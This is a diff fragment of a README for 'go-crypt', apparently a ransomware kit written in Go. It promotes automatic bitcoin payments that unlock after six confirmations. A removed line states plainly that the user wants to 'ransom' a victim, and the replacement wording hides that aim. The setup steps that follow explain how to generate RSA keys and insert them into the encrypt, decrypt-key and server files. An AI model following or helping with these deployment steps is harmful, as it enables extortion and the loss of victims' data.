target111/go-crypt/README.md

 * Convenience - Automatic bitcoin transactions.
 Unlocks at 6+ confirmations.

 ## How it works
 Blah, blah, you don't care about the details..
-You only want to ransom some poor fuck so here's what you need to do:
+You only want to get this thing running here's what you need to do:
 1. `go run gen_rsa.go`
     1. copy values
     2. modify `decrypt-key.go`, `crypter/encrypt.go` and `server.go` with those values (there are comments that tell you where those things should go)